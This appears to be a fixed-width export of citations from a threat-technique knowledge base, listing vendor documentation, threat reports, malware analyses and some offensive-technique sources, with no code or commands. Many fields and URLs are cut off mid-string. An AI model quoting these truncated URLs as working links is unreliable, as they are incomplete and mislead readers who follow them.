TechNet ShMicrosoft. https://technet.microsoft.com/library/cc770880.aspx
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Shared_resource
Peripheral Shahriar Shhttps://linuxhint.com/list-usb-devices-linux/
Peripheral SS64. (n.d. https://ss64.com/osx/system_profiler.html
3OHA doubl Juan Tapiadhttps://0xjet.github.io/3OHA/2022/04/11/post.html
Microsoft Microsoft Thttps://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stea
Sandfly BP The Sandflyhttps://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/
Microsoft M. Satran, https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists
Microsoft Microsoft. https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces
EventTrackNetsurion. https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/
FireEye MaCaban, D. ahttps://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technica
MRWLabs Of Knowles, W.https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
Microsoft OMicrosoft. https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
GlobalDot Shukrun, S.https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence
Microsoft Microsoft. https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help
ESET Light Faou, M. ( https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
Amazon Des Amazon. (n.https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
Google Ins Google. (n.https://cloud.google.com/compute/docs/reference/rest/v1/instances
Microsoft Microsoft. https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get
OSX.FairyTPhile Stokehttps://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/
PenTestLa Administrahttps://pentestlaboratories.com/2020/05/26/appdomainmanager-injection-and-detection/
Microsoft Microsoft. https://learn.microsoft.com/dotnet/framework/app-domains/application-domains
PwC YellowPwC Threathttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scrip
Rapid7 AppSpagnola, https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red
AWS EKS IAAmazon Web https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html
Google CloGoogle Clou https://cloud.google.com/kubernetes-engine/docs/how-to/iam
Kuberente Kuberenets. https://kubernetes.io/docs/reference/access-authn-authz/abac/
Kubernete Kubernetes. https://kubernetes.io/docs/concepts/security/rbac-good-practices/
Aquasec KuMichael Kathttps://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
Microsoft Microsoft Ahttps://learn.microsoft.com/en-us/azure/aks/concepts-identity
TechNet TaMicrosoft. https://technet.microsoft.com/en-us/library/cc785125.aspx
TrendMicroCo, M. andhttps://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe
LOLBAS MsLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Msiexec/
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated
PentestingGarcía, C. https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
Cloudflare Cloudflare.https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/
Cloudflare Cloudflare.https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
Cloudflare Marek Majkohttps://blog.cloudflare.com/reflections-on-reflections/
Cloudflare Marek Majk https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
Clymb3r FuBialek, J. https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
Carnal OwnFuller, R. http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
James TermJames. (20 https://x.com/james_inthe_box/status/1150495335812177920
Microsoft Microsoft. https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundament
Microsoft Microsoft. https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
RDPWrap GStas'M Corhttps://github.com/stascorp/rdpwrap
Windows OWindows OS http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
Apple ApplApple. (201https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangG
SentinelOnPhil Stokeshttps://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/
Macro Malw Yerko Grbichttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/
Chrome ExtBrinkmann,https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/
xorrior ch Chris Ross.https://www.xorrior.com/No-Place-Like-Chrome/
Chrome ExtChrome. (nhttps://developer.chrome.com/extensions
ICEBRG ChrDe Tore, Mhttps://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million
Malicious Jagpal, N., https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
Chrome ExtKjaer, M. https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
Catch All Marinho, R.https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Da
Banker GooMarinho, Rhttps://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/
Browser AdMicrosoft Thttps://www.microsoft.com/en-us/security/blog/2020/12/10/widespread-malware-campaign-seeks-to-s
Browers FrRaggi, Mic https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-ta
Stantinko Vachon, F.,https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-s
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Browser_extension
Arbor SSLDASERT Team https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new
Cloudflare Cloudflare.https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/
MACOS CoApple. (201https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Ov
Apple CoreApple. (n.dhttps://developer.apple.com/documentation/coreservices
macOS FouApple. (n.dhttps://developer.apple.com/documentation/foundation
OutFlank Sde Plaa, C. https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass
Redops SysFeichter, Dhttps://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls
GNU Fork Free Softwahttps://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html
CyberBit SyGavriel, H https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-us
GLIBC glibc devel https://www.gnu.org/software/libc/
LIBC Kerrisk, M.https://man7.org/linux/man-pages//man7/libc.7.html
Linux KerneLinux Kernehttps://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html
MDSec SystMDSec Rese https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-f
Microsoft Microsoft. https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createp
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/win32/api/
Microsoft Microsoft. https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework
NT API Wi The NTinterhttps://undocumented.ntinternals.net/
Binary Def ARC Labs, https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncove
Kerberos GAdepts of https://adepts.of0x.cc/kerberos-thievery-linux/
Kekeo Benjamin De https://github.com/gentilkiwi/kekeo
SpectorOpsCody Thoma https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
Linux KerbeTrevor Haskhttps://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
FreeDesktofreedesktop https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html
Microsoft Microsoft. https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-deskto
Moran RDPMoran, B. https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf
Apple Culprrjben. (201https://discussions.apple.com/thread/3991574
Microsoft Bani, M. (2https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-s
Harmj0y RoHarmJ0y. ( https://blog.harmj0y.net/activedirectory/roasting-as-reps/
StealthbitsJeff Warrenhttps://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
SANS AttacMedin, T. https://redsiege.com/kerberoast-slides
AdSecurityMetcalf, S https://adsecurity.org/?p=2293
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
Microsoft Sanyal, M..https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-s
NSA NCSC TNSA/NCSC.https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%
(
AutoHotKeAutoHotkeyhttps://www.autohotkey.com/docs/v1/Program.htm
AutoIT AutoIT. (n. https://www.autoitscript.com/autoit3/docs/intro/running.htm
Splunk DarSplunk Threhttps://www.splunk.com/en_us/blog/security/enter-the-gates-an-analysis-of-the-darkgate-autoit-loade
Sophos Pow jak. (2020, https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-quer
Microsoft Microsoft. https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?
Sophos Pow Vikas, S. https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensic
Bleeping CBill Toulas https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-dep
Evi1cg ForfEvi1cg. (20https://x.com/Evi1cg/status/935027922397573120
RSA Forfil Partington,https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for
Secure TeaSecure Teahttps://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
SS64 SS64. (n.d. https://ss64.com/nt/scriptrunner.html
VectorSec vector_sechttps://x.com/vector_sec/status/896049052642533376
Windows Ma Lucian Conshttps://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-co
iPhone ChaZack Whittahttps://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/
Exploiting Zhaohui Wa https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&rep=rep1&type=pdf
show_run_Cisco. (20 https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_p
Mandiant AGyler, C.,P https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits
Volexity Adair, S.. https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeti
Malwarebyt Malwarebyt https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attac
Carbon BlaTedesco, Bhttps://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-disc
PfammatterDamian Pfahttps://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
SilentBrea Landers, N.https://silentbreaksecurity.com/malicious-outlook-rules/
Google Cl Punsaen Bhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
Emotet sh The DFIR Rhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware
Awake SecuGary Golomhttps://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
Netcraft S Graham Edge https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
MSTIC NobMicrosoft Thttps://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-pr
Microsoft Microsoft. https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations
Linux Use Man7. (n.dhttps://www.man7.org/linux/man-pages/man8/usermod.8.html
Microsoft Microsoft. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012
Microsoft Microsoft. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012
Microsoft Microsoft. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-prote
RootDSE AD Scarred Mon https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
Volexity O Adair, S. https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through
Talos IPFS Edmund Bru https://blog.talosintelligence.com/ipfs-abuse/
Avast CCle Avast Threahttps://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had
Command CF ommand https://www.commandfive.com/papers/C5_APT_SKHack.pdf
Fiv
IBM StorwiIBM Support https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&my
Symantec EO'Gorman,https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/m
Schneider Schneider https://www.se.com/us/en/download/document/SESN-2018-236-01/
Microsoft Windows De https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-ma
CWE top 2 Christey, S https://cwe.mitre.org/top25/index.html
CIS MultiplCIS. (2017, https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-all
NVD CVE-2National Vuhttps://nvd.nist.gov/vuln/detail/CVE-2016-6662
NVD CVE-2National Vuhttps://nvd.nist.gov/vuln/detail/CVE-2014-7169
OWASP Top OWASP. (20 https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CERT-EU Go Abolins, D. https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007
StealthbitsJeff Warrenhttps://blog.stealthbits.com/detect-pass-the-ticket-attacks
ADSecurityMetcalf, S. https://adsecurity.org/?p=1515
Microsoft Microsoft. https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
Microsoft KMicrosoft. https://docs.microsoft.com/windows-server/administration/windows-commands/klist
ADSecuritySean Metcal https://adsecurity.org/?p=227
F-Secure T F-Secure L https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf
CrowdStrikCrowdStrike https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf
CrySyS Blo CrySyS Lab.https://blog.crysys.hu/2013/03/teamspy/
Google Ch Google. (n.https://support.google.com/chrome/answer/1649523
Chrome ReHuntress. (https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1
Symantec LiWueest, C.,https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-th
URI UniqueAustralian https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-M
PaypalSca Bob Sullivahttps://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/
CISA MSS SCISA. (2020https://us-cert.cisa.gov/ncas/alerts/aa20-258a
bypass_web Fehrman, B.https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/
FireEye APFireEye. ( https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/g
Domain_StKrebs, B. https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-ca
tt_oblique Malhotra, Ahttps://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html
tt_httrack Malhotra, Ahttps://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html
CategorisaMDSec Resea https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/
URI Michael Cobhttps://www.techtarget.com/searchsecurity/tip/Preparing-for-uniform-resource-identifier-URI-exploits
Redirector Mudge, R. (https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/
URI Use Nathan McFe https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfet
iOS URL S Ostorlab. ( https://docs.ostorlab.co/kb/IPA_URL_SCHEME_HIJACKING/index.html
lazgroup_i RISKIQ. (20https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-crypto
httrack_unRISKIQ. (20https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infr
PyPI RAR mkz. (2020)https://pypi.org/project/rarfile/
libzip D. Baron, Thttps://libzip.org/
Zlib Githubmadler. (20https://github.com/madler/zlib
LOLBAS Mai LOLBAS. (n.https://lolbas-project.github.io/
FireEye ApBallenthin,http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf
Black Hat Pierce, Seahttps://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application
Bloxham Bloxham, B.https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-W
AddMonitoMicrosoft. https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
Volexity S Cash, D. e https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-org
CybereasonDahan, A. (https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20
mailx man Michael Kerhttps://man7.org/linux/man-pages/man1/mailx.1p.html
ExchangePMicrosoft. https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes
Microsoft Microsoft. https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-com
Login ScripApple. (201https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Ch
LoginWindoApple. (n.dhttps://developer.apple.com/documentation/devicemanagement/loginwindowscripts
Wardle PerPatrick Warhttps://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf
S1 macOs PStokes, P. https://www.sentinelone.com/blog/how-malware-persists-on-macos/
EFF China Budington,https://www.eff.org/deeplinks/2015/04/china-uses-unencrypted-websites-to-hijack-browsers-in-github-
ESET MousFaou, M. ( https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplo
Kaspersky Kaspersky Ihttps://encyclopedia.kaspersky.com/glossary/man-in-the-middle-attack/
Kaspersky Starikova, https://usa.kaspersky.com/blog/man-on-the-side/27854/
GNU Acct GNU. (2010https://www.gnu.org/software/acct/
RHEL auditJahoda, M.https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap
ArtOfMemo Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and
Chokepointstderr. (20 http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
Checkmarx Jossef Har https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-v
CyberArk LCyberArk Lahttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord
Discord In D. (n.d.). https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks
Microsoft Microsoft Thttps://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sq
Talos Disc Nick Biasinhttps://blog.talosintelligence.com/collab-app-abuse/
Push SecurPush Securihttps://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md
RedHat WeRedHat. (20https://www.redhat.com/en/topics/automation/what-is-a-webhook
Bleeping CAbrams, L. https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offl
AMD MagicAMD. (1995https://www.amd.com/system/files/TechDocs/20213.pdf
Mandiant -Bill Hau, T https://www.mandiant.com/resources/synful-knock-acis
Hartrell cd Hartrell, G https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
GitLab Wa Perry, Dav https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN
EC2 Instan AWS. (2023, https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html
AWS SysteAWS. (2023https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html
lucr-3: GetIan Ahl. (2 https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
SIM SwappiMandiant In https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial
Azure SeriaMicrosoft. https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/serial-console-overview
GTFO split GTFOBins. https://gtfobins.github.io/gtfobins/split/
(
LOLBAS ProOddvar Moe https://github.com/LOLBAS-Project/LOLBAS#criteria
